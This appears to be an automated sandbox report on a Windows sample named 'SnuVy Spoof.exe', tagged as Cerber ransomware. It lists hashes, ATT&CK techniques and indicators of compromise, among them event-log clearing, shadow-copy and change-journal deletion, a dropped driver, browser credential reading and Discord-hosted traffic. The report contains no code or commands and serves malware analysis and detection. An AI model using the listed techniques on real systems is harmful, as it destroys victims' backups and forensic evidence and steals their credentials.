cerber | 9d3219f467a2616a7e6844ecbb0df5c5dddf8536d444691bd2c18bb899092eb2

Analysis

max time kernel
146s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-11-2024 00:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SnuVy Spoof.exe
Size

746KB
MD5

65b0e91512cc8d241ecc81dcba75d018
SHA1

3552fd50d9db83ba21abc56c6cd986637c3df51f
SHA256

9d3219f467a2616a7e6844ecbb0df5c5dddf8536d444691bd2c18bb899092eb2
SHA512

5ef4fa0cb5645a2f6582e20f2e21b770737ae2938a8b609131ea6cefef269b938d5b2ca70713af8f071e5d3a04778e5b01a975f4b2e5f44090245c70aed9b017
SSDEEP

12288:qr8DUq79BdXaHsLXqltIRIyr50UaGIdlijbZVIE:qrYUOBp5XqltmP6UaGEkj3

Score

10^/10

cerber defense_evasion discovery evasion execution impact persistence ransomware spyware stealer

Malware Config

Signatures

Cerber 12 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		Process not Found
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		Process not Found
		2220	taskkill.exe
		3496	taskkill.exe
		4808	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		Process not Found
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		Process not Found
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		Process not Found
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		Process not Found
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		Process not Found
		3024	taskkill.exe
		3824	taskkill.exe

Cerber family
cerber

Deletes NTFS Change Journal 2 TTPs 3 IoCs

The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

ransomware

Inhibit System Recovery

T1490

Data Destruction

T1485

pid	Process
1764	fsutil.exe
5008	fsutil.exe
3064	fsutil.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
4904	wevtutil.exe
1164	wevtutil.exe
5072	Process not Found
4716	Process not Found
3456	Process not Found
3368	wevtutil.exe
3380	wevtutil.exe
3012	wevtutil.exe
2584	wevtutil.exe
3256	Process not Found
2928	Process not Found
4808	Process not Found
4992	wevtutil.exe
1764	wevtutil.exe
1676	wevtutil.exe
4384	wevtutil.exe
1956	Process not Found
3768	Process not Found
4960	Process not Found
2676	wevtutil.exe
3748	wevtutil.exe
2420	wevtutil.exe
3012	wevtutil.exe
1652	wevtutil.exe
3024	Process not Found
3888	wevtutil.exe
4840	wevtutil.exe
3900	wevtutil.exe
4344	wevtutil.exe
2040	wevtutil.exe
284	wevtutil.exe
3256	Process not Found
1004	wevtutil.exe
1548	wevtutil.exe
4380	Process not Found
4072	wevtutil.exe
3532	wevtutil.exe
2744	Process not Found
4588	Process not Found
2628	wevtutil.exe
1956	wevtutil.exe
2712	wevtutil.exe
3980	wevtutil.exe
4860	wevtutil.exe
2712	wevtutil.exe
2420	wevtutil.exe
2904	wevtutil.exe
4920	wevtutil.exe
2712	Process not Found
5072	wevtutil.exe
1756	wevtutil.exe
300	wevtutil.exe
2216	wevtutil.exe
1080	Process not Found
1524	wevtutil.exe
3384	wevtutil.exe
2984	wevtutil.exe
4384	wevtutil.exe
4308	wevtutil.exe
4444	wevtutil.exe
2616	Process not Found
2648	Process not Found
1264	Process not Found
1748	Process not Found

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Detected Nirsoft tools 1 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/files/0x0007000000023cf4-309.dat	Nirsoft

Downloads MZ/PE file

Drops file in Drivers directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File created	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Cleaner8.exe

Executes dropped EXE 26 IoCs

pid	Process
3736	ZRGHJR345.exe
2940	FIXusrTEMPv6.exe
3900	ddc.exe
1416	cleanerOLD1.exe
4808	Cleaner8.exe
632	AdvancedEventCleaner.exe
4832	Process not Found
1364	Process not Found
3460	Process not Found
4904	Process not Found
4528	Process not Found
4576	Process not Found
1580	Process not Found
2000	Process not Found
3892	Process not Found
4072	Process not Found
908	Process not Found
1416	Process not Found
3524	Process not Found
320	Process not Found
4716	Process not Found
4860	Process not Found
4324	Process not Found
2096	Process not Found
4296	Process not Found
4008	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 60 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	Cleaner8.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	fsutil.exe
File opened (read-only)	\??\E:	fsutil.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
23	discord.com

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1696	wevtutil.exe

Checks system information in the registry 2 TTPs 1 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	ddc.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\wbem\repository\OBJECTS.DATA	Process not Found
File opened for modification	C:\Windows\System32\restore\MachineGuid.txt	Cleaner8.exe
File opened for modification	C:\Windows\System32\spp\store	Cleaner8.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING3.MAP	Process not Found
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING2.MAP	Process not Found
File opened for modification	C:\Windows\system32\wbem\repository\INDEX.BTR	Process not Found
File opened for modification	C:\Windows\system32\wbem\repository	Process not Found
File opened for modification	C:\Windows\system32\wbem\repository\WRITABLE.TST	Process not Found
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING1.MAP	Process not Found

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Prefetch\AgGlFaultHistory.db	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-FF8EBD82.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-7BB97BF6.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-FCAF5656.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\TAKEOWN.EXE-A80759AD.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\WFSERVICESREG.EXE-766D3C5B.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-C4317749.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-01E21A55.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-32DA767E.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-7194EF5E.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\PfSvPerfStats.bin	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-0A03C9B5.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-AE7DB802.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-E66A223C.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-4BA0E729.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-4DE02988.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-002D6F84.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-08AF006C.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\ONEDRIVESETUP.EXE-8CE5A462.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-7CFEDEA3.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\TASKKILL.EXE-8F5B2253.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\VSSVC.EXE-B8AFC319.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\AgGlFgAppHistory.db	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\LINQWEBCONFIG.EXE-0FDCD1CB.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-AED2006F.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-EDE0F878.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\TEXTINPUTHOST.EXE-4AE33179.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\APPLICATIONFRAMEHOST.EXE-CCEEF759.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\NGEN.EXE-AE594A6B.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DLLHOST.EXE-FC981FFE.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\CONHOST.EXE-1F3E9D7E.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DISM.EXE-DE199F71.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-373C0EED.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SHELLEXPERIENCEHOST.EXE-A3608B1E.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-9F4DB6F5.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\WFSERVICESREG.EXE-3EE82250.pf	Cleaner8.exe
File opened for modification	C:\Windows\INF\setupapi.setup.log	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DLLHOST.EXE-504C779A.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-B2C296EF.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-C5BE1C43.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-D71F3FEA.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\BYTECODEGENERATOR.EXE-C1E9BCE6.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-18665B15.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SGRMBROKER.EXE-0CA31CC6.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-E45D8788.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-98F22970.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-BC366267.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-94A02D86.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\NGEN.EXE-EC3F9239.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-7CB48DE8.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\POWERSHELL.EXE-920BBA2A.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-DB926CB0.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-C4B5739C.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-F027B880.pf	Cleaner8.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\MOUSOCOREWORKER.EXE-681A8FEE.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-039D5D2E.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-156D43F1.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-16AF9B6E.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\AgAppLaunch.db	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\ASPNET_REGIIS.EXE-945CDB73.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\PfPre_4c41acc9.mkd	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-5B70F332.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNDLL32.EXE-C8D69DC6.pf	Cleaner8.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
752	sc.exe
4916	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ddc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cleanerOLD1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 27 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2412	Process not Found
2536	Process not Found
1648	Process not Found
4660	Process not Found
4152	PING.EXE
2728	PING.EXE
1080	Process not Found
3748	Process not Found
3256	Process not Found
1108	PING.EXE
2464	PING.EXE
388	Process not Found
3368	Process not Found
2756	Process not Found
220	Process not Found
4072	Process not Found
3536	PING.EXE
4488	Process not Found
988	Process not Found
5036	Process not Found
992	Process not Found
4944	Process not Found
3744	Process not Found
5008	Process not Found
2904	Process not Found
2332	PING.EXE
1148	Process not Found

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
4588	wevtutil.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner8.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	Cleaner8.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner8.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "38bff59d-03a0a272-0"	Cleaner8.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2724	Process not Found
2904	Process not Found
4384	Process not Found

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2332	vssadmin.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
3824	taskkill.exe
4808	taskkill.exe
2220	taskkill.exe
3496	taskkill.exe
3024	taskkill.exe
3900	Process not Found
2136	Process not Found
2368	Process not Found

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = a58c79fa0acd9f0b	Cleaner8.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4089630652-1596403869-279772308-1000\{FD5C05D2-8AF3-42C1-94A3-0542BBBD7ADA}	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5008	reg.exe
1124	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 27 IoCs

Remote System Discovery

T1018

pid	Process
3256	Process not Found
2904	Process not Found
388	Process not Found
2412	Process not Found
992	Process not Found
5008	Process not Found
3536	PING.EXE
2464	PING.EXE
988	Process not Found
1080	Process not Found
1648	Process not Found
3368	Process not Found
3748	Process not Found
1148	Process not Found
3744	Process not Found
4072	Process not Found
2332	PING.EXE
4152	PING.EXE
4488	Process not Found
2536	Process not Found
4944	Process not Found
220	Process not Found
1108	PING.EXE
5036	Process not Found
4660	Process not Found
2728	PING.EXE
2756	Process not Found

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1032	msedge.exe
1032	msedge.exe
2320	msedge.exe
2320	msedge.exe
700	msedge.exe
700	msedge.exe
1416	cleanerOLD1.exe
1416	cleanerOLD1.exe
1416	cleanerOLD1.exe
4808	Cleaner8.exe
4808	Cleaner8.exe
4832	Process not Found
4832	Process not Found

Suspicious behavior: LoadsDriver 21 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
2320	msedge.exe
2320	msedge.exe
2320	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3824	taskkill.exe
Token: SeDebugPrivilege	4808	taskkill.exe
Token: SeDebugPrivilege	2220	taskkill.exe
Token: SeDebugPrivilege	3496	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	1416	cleanerOLD1.exe
Token: SeTakeOwnershipPrivilege	4808	Cleaner8.exe
Token: SeBackupPrivilege	1920	vssvc.exe
Token: SeRestorePrivilege	1920	vssvc.exe
Token: SeAuditPrivilege	1920	vssvc.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	628	wevtutil.exe
Token: SeBackupPrivilege	628	wevtutil.exe
Token: SeSecurityPrivilege	3540	wevtutil.exe
Token: SeBackupPrivilege	3540	wevtutil.exe
Token: SeSecurityPrivilege	3068	wevtutil.exe
Token: SeBackupPrivilege	3068	wevtutil.exe
Token: SeSecurityPrivilege	3624	wevtutil.exe
Token: SeBackupPrivilege	3624	wevtutil.exe
Token: SeSecurityPrivilege	540	wevtutil.exe
Token: SeBackupPrivilege	540	wevtutil.exe
Token: SeSecurityPrivilege	4924	wevtutil.exe
Token: SeBackupPrivilege	4924	wevtutil.exe
Token: SeSecurityPrivilege	3980	wevtutil.exe
Token: SeBackupPrivilege	3980	wevtutil.exe
Token: SeSecurityPrivilege	4260	wevtutil.exe
Token: SeBackupPrivilege	4260	wevtutil.exe
Token: SeSecurityPrivilege	5076	wevtutil.exe
Token: SeBackupPrivilege	5076	wevtutil.exe
Token: SeSecurityPrivilege	420	wevtutil.exe
Token: SeBackupPrivilege	420	wevtutil.exe
Token: SeSecurityPrivilege	1092	wevtutil.exe
Token: SeBackupPrivilege	1092	wevtutil.exe
Token: SeSecurityPrivilege	4056	wevtutil.exe
Token: SeBackupPrivilege	4056	wevtutil.exe
Token: SeSecurityPrivilege	4312	wevtutil.exe
Token: SeBackupPrivilege	4312	wevtutil.exe
Token: SeSecurityPrivilege	4328	wevtutil.exe
Token: SeBackupPrivilege	4328	wevtutil.exe
Token: SeSecurityPrivilege	3560	wevtutil.exe
Token: SeBackupPrivilege	3560	wevtutil.exe
Token: SeSecurityPrivilege	3528	wevtutil.exe
Token: SeBackupPrivilege	3528	wevtutil.exe
Token: SeSecurityPrivilege	3012	wevtutil.exe
Token: SeBackupPrivilege	3012	wevtutil.exe
Token: SeSecurityPrivilege	4524	wevtutil.exe
Token: SeBackupPrivilege	4524	wevtutil.exe
Token: SeSecurityPrivilege	2904	wevtutil.exe
Token: SeBackupPrivilege	2904	wevtutil.exe
Token: SeSecurityPrivilege	4028	wevtutil.exe
Token: SeBackupPrivilege	4028	wevtutil.exe
Token: SeSecurityPrivilege	5012	wevtutil.exe
Token: SeBackupPrivilege	5012	wevtutil.exe
Token: SeSecurityPrivilege	4588	wevtutil.exe
Token: SeBackupPrivilege	4588	wevtutil.exe
Token: SeSecurityPrivilege	3396	wevtutil.exe
Token: SeBackupPrivilege	3396	wevtutil.exe
Token: SeSecurityPrivilege	1364	wevtutil.exe
